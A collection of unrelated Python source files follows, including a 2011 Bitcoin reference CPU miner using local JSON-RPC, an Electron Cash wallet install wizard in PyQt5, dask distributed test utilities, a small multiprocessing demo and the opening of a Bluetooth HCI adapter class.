self.stdout.write('Starting webdriver...')
with open(os.devnull, 'w') as f:
subprocess.call(['webdriver-manager', 'update'], stdout=f, stderr=f)
subprocess.Popen(['webdriver-manager', 'start'], stdout=f, stderr=f)
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
    if 'error' in resp_obj and resp_obj['error'] is not None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
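# Endianness helpers: getwork serves the block header as hex 32-bit words
# that have to be byte-swapped before hashing, and the resulting hash is
# byte- and word-reversed again before the numeric comparison with 'target'.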
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
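  # The getwork 'data' field is 256 hex characters (80-byte header plus
  # SHA-256 padding); the nonce is header bytes 76-80, i.e. hex characters
  # 152-160, which is the slice spliced below.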
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
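  # Example config file, one key=value per line ('#' starts a comment);
  # the credential values here are placeholders:
  #   host=127.0.0.1
  #   port=6888
  #   rpcuser=someuser
  #   rpcpass=somepassword
  #   threads=1
  #   hashmeter=1
  #   scantime=30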
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 6888
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
installwizard.py
|
# -*- mode: python3 -*-
import os
import sys
import threading
import traceback
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electroncash import Wallet, WalletStorage
from electroncash.util import UserCancelled, InvalidPassword, finalization_print_error
from electroncash.base_wizard import BaseWizard
from electroncash.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PW_NEW
from .bip38_importer import Bip38Importer
class GoBack(Exception):
pass
MSG_GENERATING_WAIT = _("Electron Cash is generating your addresses, please wait...")
MSG_ENTER_ANYTHING = _("Please enter a seed phrase, a master key, a list of "
"Bitcoin addresses, or a list of private keys")
MSG_ENTER_SEED_OR_MPK = _("Please enter a seed phrase or a master key (xpub or xprv):")
MSG_COSIGNER = _("Please enter the master public key of cosigner #{}:")
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_RESTORE_PASSPHRASE = \
_("Please enter your seed derivation passphrase. "
"Note: this is NOT your encryption password. "
"Leave this field empty if you did not use one or are unsure.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
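    # Draw the m-of-n indicator as a pie of n equal slices (Qt angles are in
    # 1/16 of a degree, hence the factor of 16); the first m slices are drawn
    # green and the remainder grey.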
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
      alpha = int(16 * 360 * i / self.n)
      alpha2 = int(16 * 360 * 1 / self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
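  # Decorator for wizard page methods: relabels the back button as Cancel on
  # the first page, maps GoBack to stepping back (or closing the wizard),
  # swallows UserCancelled, and forwards the page's return value(s) to the
  # run_next callback supplied by the caller.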
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
synchronized_signal = pyqtSignal(str)
def __init__(self, config, app, plugins, storage):
BaseWizard.__init__(self, config, storage)
QDialog.__init__(self, None)
self.setWindowTitle('Electron Cash - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for base base class
self.plugins = plugins
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
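    # Event-loop exit codes: 0 = dialog rejected/cancelled, 1 = Back,
    # 2 = Next; exec_layout() and run_and_get_wallet() key off these values.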
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon(':icons/electron.svg')
self.show()
self.raise_()
# Track object lifecycle
finalization_print_error(self)
def run_and_get_wallet(self):
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Electron Cash wallet'))
wallet_folder = os.path.dirname(self.storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
try:
self.storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except IOError:
self.storage = None
self.next_button.setEnabled(False)
if self.storage:
if not self.storage.file_exists():
          msg = _("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
pw = False
elif self.storage.file_exists() and self.storage.is_encrypted():
msg = _("This file is encrypted.") + '\n' + _('Enter your password or choose another file.')
pw = True
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.storage.path)
self.name_e.setText(n)
while True:
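      # Keep prompting until we have a usable wallet file: an existing
      # unencrypted wallet, a brand-new path, or an encrypted wallet whose
      # password decrypts successfully.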
password = None
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if self.loop.exec_() != 2: # 2 = next
return
if not self.storage.file_exists():
break
if self.storage.file_exists() and self.storage.is_encrypted():
password = self.pw_e.text()
try:
self.storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
path = self.storage.path
if self.storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
if self.storage.requires_upgrade():
self.hide()
msg = _("The format of your wallet '%s' must be upgraded for Electron Cash. This change will not be backward compatible"%path)
if not self.question(msg):
return
self.storage.upgrade()
self.wallet = Wallet(self.storage)
return self.wallet, password
action = self.storage.get_action()
if action and action != 'new':
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet, password
self.wallet = Wallet(self.storage)
return self.wallet, password
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QIcon(filename).pixmap(60))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
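    # Note (added for clarity, not in the original source): the event loop used
    # here exits with 0 when the dialog is cancelled or closed (raising
    # UserCancelled above unless raise_on_cancel is False), with 1 when the
    # user presses Back (raising GoBack), and with 2 when the user presses
    # Next, which is the value callers such as run_and_get_wallet() compare
    # against.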
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, title=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
def bip38_prompt_for_pw(self, bip38_keys):
''' Reimplemented from basewizard superclass. Expected to return the pw
dict or None. '''
d = Bip38Importer(bip38_keys, parent=self.top_level_window())
res = d.exec_()
d.setParent(None) # python GC quicker if this happens
return d.decoded_keys # dict will be empty if user cancelled
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False):
return self.text_input(title, message, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind):
playout = PasswordLayout(None, msg, kind, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next):
"""Request the user enter a new password and confirm it. Return
the password or None for no password. Note that this dialog screen
cannot go back, and instead the user can only cancel."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW)
def _add_extra_button_to_layout(self, extra_button, layout):
if (not isinstance(extra_button, (list, tuple))
or not len(extra_button) == 2):
return
but_title, but_action = extra_button
hbox = QHBoxLayout()
hbox.setContentsMargins(12,24,12,12)
but = QPushButton(but_title)
hbox.addStretch(1)
hbox.addWidget(but)
layout.addLayout(hbox)
but.clicked.connect(but_action)
@wizard_dialog
def confirm_dialog(self, title, message, run_next, extra_button=None):
self.confirm(message, title, extra_button=extra_button)
def confirm(self, message, title, extra_button=None):
label = WWLabel(message)
textInteractionFlags = (Qt.LinksAccessibleByMouse
| Qt.TextSelectableByMouse
| Qt.TextSelectableByKeyboard
| Qt.LinksAccessibleByKeyboard)
label.setTextInteractionFlags(textInteractionFlags)
label.setOpenExternalLinks(True)
vbox = QVBoxLayout()
vbox.addWidget(label)
if extra_button:
self._add_extra_button_to_layout(extra_button, vbox)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.accept_signal.emit()
def waiting_dialog(self, task, msg):
self.please_wait.setText(MSG_GENERATING_WAIT)
self.refresh_gui()
t = threading.Thread(target = task)
t.start()
t.join()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next, extra_button=None):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
if extra_button:
self._add_extra_button_to_layout(extra_button, vbox)
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning=''):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
self.exec_layout(vbox, title, next_enabled=test(default))
return ' '.join(line.text().split())
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electron Cash communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfil the same purpose only differing in "
"hardware. In most cases you simply want to let Electron Cash "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
network.auto_connect = (r == 0)
self.config.set_key('auto_connect', network.auto_connect, True)
if r == 1:
nlayout = NetworkChoiceLayout(self, network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(1)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require %d signatures')%m)
cw.set_m(m)
def on_n(n):
n_label.setText(_('From %d cosigners')%n)
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
linux_hw_wallet_support_dialog = None
def on_hw_wallet_support(self):
''' Overrides base wizard's noop impl. '''
if sys.platform.startswith("linux"):
if self.linux_hw_wallet_support_dialog:
self.linux_hw_wallet_support_dialog.raise_()
return
# NB: this should only be imported from Linux
from . import udev_installer
self.linux_hw_wallet_support_dialog = udev_installer.InstallHardwareWalletSupportDialog(self.top_level_window(), self.plugins)
self.linux_hw_wallet_support_dialog.exec_()
self.linux_hw_wallet_support_dialog.setParent(None)
self.linux_hw_wallet_support_dialog = None
else:
self.show_error("Linux only facility. FIXME!")
|
test_utils_test.py
|
import asyncio
import pathlib
import socket
import threading
from contextlib import contextmanager
from time import sleep
import pytest
from tornado import gen
from distributed import Client, Nanny, Scheduler, Worker, config, default_client
from distributed.core import rpc
from distributed.metrics import time
from distributed.utils import get_ip
from distributed.utils_test import (
cluster,
gen_cluster,
gen_test,
inc,
new_config,
tls_only_security,
wait_for_port,
)
def test_bare_cluster(loop):
with cluster(nworkers=10) as (s, _):
pass
def test_cluster(loop):
with cluster() as (s, [a, b]):
with rpc(s["address"]) as s:
ident = loop.run_sync(s.identity)
assert ident["type"] == "Scheduler"
assert len(ident["workers"]) == 2
@gen_cluster(client=True)
async def test_gen_cluster(c, s, a, b):
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
assert await c.submit(lambda: 123) == 123
@gen_cluster(client=True)
async def test_gen_cluster_pytest_fixture(c, s, a, b, tmp_path):
assert isinstance(tmp_path, pathlib.Path)
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
@pytest.mark.parametrize("foo", [True])
@gen_cluster(client=True)
async def test_gen_cluster_parametrized(c, s, a, b, foo):
assert foo is True
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
@pytest.mark.parametrize("foo", [True])
@pytest.mark.parametrize("bar", ["a", "b"])
@gen_cluster(client=True)
async def test_gen_cluster_multi_parametrized(c, s, a, b, foo, bar):
assert foo is True
assert bar in ("a", "b")
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
@pytest.mark.parametrize("foo", [True])
@gen_cluster(client=True)
async def test_gen_cluster_parametrized_variadic_workers(c, s, *workers, foo):
assert foo is True
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in workers:
assert isinstance(w, Worker)
@gen_cluster(
client=True,
Worker=Nanny,
config={"distributed.comm.timeouts.connect": "1s", "new.config.value": "foo"},
)
async def test_gen_cluster_set_config_nanny(c, s, a, b):
def assert_config():
import dask
assert dask.config.get("distributed.comm.timeouts.connect") == "1s"
assert dask.config.get("new.config.value") == "foo"
return dask.config
await c.run(assert_config)
await c.run_on_scheduler(assert_config)
@gen_cluster(client=True)
def test_gen_cluster_legacy_implicit(c, s, a, b):
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
assert (yield c.submit(lambda: 123)) == 123
@gen_cluster(client=True)
@gen.coroutine
def test_gen_cluster_legacy_explicit(c, s, a, b):
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
assert (yield c.submit(lambda: 123)) == 123
@pytest.mark.skip(reason="This hangs on travis")
def test_gen_cluster_cleans_up_client(loop):
import dask.context
assert not dask.config.get("get", None)
@gen_cluster(client=True)
async def f(c, s, a, b):
assert dask.config.get("get", None)
await c.submit(inc, 1)
f()
assert not dask.config.get("get", None)
@gen_cluster()
async def test_gen_cluster_without_client(s, a, b):
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
async with Client(s.address, asynchronous=True) as c:
future = c.submit(lambda x: x + 1, 1)
result = await future
assert result == 2
@gen_cluster(
client=True,
scheduler="tls://127.0.0.1",
nthreads=[("tls://127.0.0.1", 1), ("tls://127.0.0.1", 2)],
security=tls_only_security(),
)
async def test_gen_cluster_tls(e, s, a, b):
assert isinstance(e, Client)
assert isinstance(s, Scheduler)
assert s.address.startswith("tls://")
for w in [a, b]:
assert isinstance(w, Worker)
assert w.address.startswith("tls://")
assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
@gen_test()
async def test_gen_test():
await asyncio.sleep(0.01)
@gen_test()
def test_gen_test_legacy_implicit():
yield asyncio.sleep(0.01)
@gen_test()
@gen.coroutine
def test_gen_test_legacy_explicit():
yield asyncio.sleep(0.01)
@contextmanager
def _listen(delay=0):
serv = socket.socket()
serv.bind(("127.0.0.1", 0))
e = threading.Event()
def do_listen():
e.set()
sleep(delay)
serv.listen(5)
ret = serv.accept()
if ret is not None:
cli, _ = ret
cli.close()
serv.close()
t = threading.Thread(target=do_listen)
t.daemon = True
t.start()
try:
e.wait()
sleep(0.01)
yield serv
finally:
t.join(5.0)
def test_wait_for_port():
t1 = time()
with pytest.raises(RuntimeError):
wait_for_port((get_ip(), 9999), 0.5)
t2 = time()
assert t2 - t1 >= 0.5
with _listen(0) as s1:
t1 = time()
wait_for_port(s1.getsockname())
t2 = time()
assert t2 - t1 <= 1.0
with _listen(1) as s1:
t1 = time()
wait_for_port(s1.getsockname())
t2 = time()
assert t2 - t1 <= 2.0
def test_new_config():
c = config.copy()
with new_config({"xyzzy": 5}):
config["xyzzy"] == 5
assert config == c
assert "xyzzy" not in config
def test_lingering_client():
@gen_cluster()
async def f(s, a, b):
await Client(s.address, asynchronous=True)
f()
with pytest.raises(ValueError):
default_client()
def test_lingering_client_2(loop):
with cluster() as (s, [a, b]):
client = Client(s["address"], loop=loop)
def test_tls_cluster(tls_client):
    assert tls_client.submit(lambda x: x + 1, 10).result() == 11
assert tls_client.security
@pytest.mark.asyncio
async def test_tls_scheduler(security, cleanup):
async with Scheduler(security=security, host="localhost") as s:
assert s.address.startswith("tls")
|
futuros.py
|
import time
import multiprocessing
print("Number of cpu : ", multiprocessing.cpu_count())
from multiprocessing import Process
def proceso(fruta):
while True:
print("hola ", fruta)
time.sleep(2)
def proceso2(fruta):
while True:
print("hola ", fruta)
time.sleep(1)
def main():
proc = Process(target=proceso, args=("guayaba",))
proc.start()
proc = Process(target=proceso2, args=("lulo",))
proc.start()
print("procesos iniciados")
print(proc.join())
if __name__ == '__main__':
main()
|
linux_adapter.py
|
import array
import fcntl
import socket
import struct
import threading
from bleson.core.hci.constants import *
from bleson.core.hci.type_converters import AdvertisingDataConverters, parse_hci_event_packet, hex_string
from bleson.core.types import Device, BDAddress
from bleson.interfaces.adapter import Adapter
from bleson.logger import log
from .constants import *
class BluetoothHCIAdapter(Adapter):
def __init__(self, device_id=0):
self.device_id = device_id
self._keep_running = True
self._socket = None
self._socket_poll_thread = None
# User callbacks
self.on_advertising_data = None
def __del__(self):
self._keep_running = False
def open(self):
self._socket = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_RAW, socket.BTPROTO_HCI)
